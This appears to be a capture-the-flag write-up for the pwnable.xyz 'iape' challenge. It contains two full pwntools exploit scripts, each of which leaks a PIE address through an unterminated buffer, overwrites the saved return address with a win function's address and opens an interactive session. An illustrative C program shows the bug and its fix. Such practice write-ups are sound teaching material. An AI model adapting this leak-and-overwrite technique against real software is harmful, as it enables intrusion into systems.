It works just fine locally but breaks on remote... ugh...
It seems it was a version problem: the PIE state differs between the 18.04 and 20.02 builds, and that seems to be what caused it.
Leak one PIE address, then overwrite the return address, and it's done.
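The leak step in both scripts below fills the buffer right up to a boundary (ending in "B"), then asks the program to print, and reads the bytes that follow the "B": a print routine that treats an unterminated buffer as a C string keeps going into the neighbouring stack slot. The following C program is an added illustration of that bug class and its fix; it is constructed for this writeup, not the challenge's code, and the layout (an 8-byte buffer next to a fake 8-byte pointer, both simulated inside one array so the demo stays well-defined) is an assumption.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model (not the iape binary): a fixed-size buffer is filled to
 * capacity with no NUL terminator, and the "print" routine treats it as a
 * C string, so output runs on into whatever sits next to it on the stack.
 * The neighbouring slot is simulated inside one array to avoid undefined
 * behaviour in the demo itself. */

#define BUF_CAP   8   /* capacity of the user buffer */
#define FRAME_LEN 16  /* buffer plus an adjacent 8-byte "saved pointer" slot */

/* Unsafe append: copies up to cap bytes and never terminates the buffer. */
static size_t append_unsafe(char *buf, size_t cap, const char *src, size_t n) {
    if (n > cap) n = cap;
    memcpy(buf, src, n);
    return n;
}

/* Hardened append: reserves one byte for the terminator and always writes it. */
static size_t append_safe(char *buf, size_t cap, const char *src, size_t n) {
    if (cap == 0) return 0;
    if (n > cap - 1) n = cap - 1;
    memcpy(buf, src, n);
    buf[n] = '\0';
    return n;
}

/* Builds the simulated frame and returns how many bytes a strlen-based
 * print (puts / printf "%s") would emit. A value above BUF_CAP means the
 * print ran into the neighbouring slot, i.e. an information leak. */
static size_t printed_length(int hardened) {
    char frame[FRAME_LEN];
    memset(frame, 0, sizeof frame);
    /* Simulated neighbouring stack slot: a fake pointer with non-zero low
     * bytes, followed by zeros so the over-read stops inside the array. */
    memcpy(frame + BUF_CAP, "\xc2\x0b\x40\x55\x55\x55\0\0", 8);

    const char *input = "AAAAAAAB";  /* 8 bytes: fills the buffer exactly */
    if (hardened)
        append_safe(frame, BUF_CAP, input, 8);
    else
        append_unsafe(frame, BUF_CAP, input, 8);

    return strlen(frame);
}

int main(void) {
    printf("unsafe append: print emits %zu bytes (buffer holds %d)\n",
           printed_length(0), BUF_CAP);
    printf("hardened append: print emits %zu bytes\n", printed_length(1));
    return 0;
}
```

With the unsafe append the print emits 14 bytes (the 8-byte buffer plus the six non-zero bytes of the fake pointer); with the hardened append it emits 7, because the last byte of the buffer is always the terminator. Compiling with `-fstack-protector` does not change this: the canary is only checked on return, and a read past the buffer does not touch it.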
ubuntu 20.02
```python
from pwn import *
#context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30014)
#p = process("./iape")
#gdb.attach(p)

arr_len = 0x400
ret_len = arr_len + 0x10   # distance from buffer start to the saved return address
win_off = 0xb5b            # offset of the win function inside the PIE binary

def print_():
    # menu option 3: print the buffer
    p.recvuntil(b"> ")
    p.sendline(b"3")

def leak_append():
    # menu option 2: append; the program picks how many chars it accepts
    p.recvuntil(b"> ")
    p.sendline(b"2")
    p.recvuntil(b"Give me ")
    num = int(p.recv(2))
    if num >= 14:
        p.recvuntil(b"chars: ")
        pay = b"A" * 9
        pay += b"B"
        p.send(pay)
        return num
    elif num == 0:
        return 0
    else:
        p.send(b"\x00")
        return 0

def append(win, payload, buf_len, target_len):
    p.recvuntil(b"> ")
    p.sendline(b"2")
    p.recvuntil(b"Give me ")
    num = int(p.recv(2))
    p.recvuntil(b"chars: ")
    if buf_len + num > target_len - 8:
        # close to the return address: feed one byte at a time
        if num >= 2:
            pay = payload[:1]
            pay += b"\x00"
            p.send(pay)
            return 1
        elif num == 0:
            return 0
        else:
            p.send(b"\x00")
            return 0
    else:
        if num >= 2:
            pay = payload[:num - 1]
            pay += b"\x00"
            p.send(pay)
            return num - 1
        elif num == 0:
            return 0
        else:
            p.send(b"\x00")
            return 0

pie = b"\x00" * 2
buf_len = 0

# PIE leak
while True:
    num = leak_append()
    if num != 0:
        buf_len += num
        break
print_()
p.recvuntil(b"B")
pie += p.recv(4)
pie += b"\x00\x00"
pie = u64(pie)
win = pie + win_off

payload = b"A" * (ret_len - 8 - buf_len)
payload += p64(win)

# overwrite ret
while True:
    num = append(win, payload, buf_len, ret_len)
    buf_len += num
    payload = payload[num:]
    print(f"length: {len(payload)}")
    print(f"{buf_len} / {ret_len}")
    #print(f"payload : {payload}")
    if buf_len >= ret_len:
        break

print("pie: " + hex(pie))
print("win: " + hex(win))
p.recvuntil(b"> ")
p.sendline(b"0")
p.interactive()
```
ubuntu 18.04
```python
from pwn import *
#context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30014)
#p = process("./iape")
#gdb.attach(p)

arr_len = 0x400
ret_len = arr_len + 0x10   # distance from buffer start to the saved return address
win_off = 0xb5b            # offset of the win function inside the PIE binary

def print_():
    # menu option 3: print the buffer
    p.recvuntil(b"> ")
    p.sendline(b"3")

def leak_append():
    # menu option 2: append; the program picks how many chars it accepts
    p.recvuntil(b"> ")
    p.sendline(b"2")
    p.recvuntil(b"Give me ")
    num = int(p.recv(2))
    if num >= 14:
        p.recvuntil(b"chars: ")
        pay = b"A" * 7
        pay += b"B"
        p.send(pay)
        return num
    elif num == 0:
        return 0
    else:
        p.send(b"\x00")
        return 0

def append(win, payload, buf_len, target_len):
    p.recvuntil(b"> ")
    p.sendline(b"2")
    p.recvuntil(b"Give me ")
    num = int(p.recv(2))
    p.recvuntil(b"chars: ")
    if buf_len + num > target_len - 8:
        # close to the return address: feed one byte at a time
        if num >= 2:
            pay = payload[:1]
            pay += b"\x00"
            p.send(pay)
            return 1
        elif num == 0:
            return 0
        else:
            p.send(b"\x00")
            return 0
    else:
        if num >= 2:
            pay = payload[:num - 1]
            pay += b"\x00"
            p.send(pay)
            return num - 1
        elif num == 0:
            return 0
        else:
            p.send(b"\x00")
            return 0

buf_len = 0

# PIE leak
while True:
    num = leak_append()
    if num != 0:
        buf_len += num
        break
print_()
p.recvuntil(b"B")
leak_pie = p.recv(6)
leak_pie += b"\x00\x00"
leak_pie = u64(leak_pie)
pie = leak_pie - 0xbc2     # leaked pointer sits at offset 0xbc2 in this build
win = pie + win_off

payload = b"A" * (ret_len - 8 - buf_len)
payload += p64(win)

# overwrite ret
while True:
    num = append(win, payload, buf_len, ret_len)
    buf_len += num
    payload = payload[num:]
    print(f"length: {len(payload)}")
    print(f"{buf_len} / {ret_len}")
    #print(f"payload : {payload}")
    if buf_len >= ret_len:
        break

print("leak pie: " + hex(leak_pie))
print("pie: " + hex(pie))
print("win: " + hex(win))
p.recvuntil(b"> ")
p.sendline(b"0")
p.interactive()
```

Wow... lol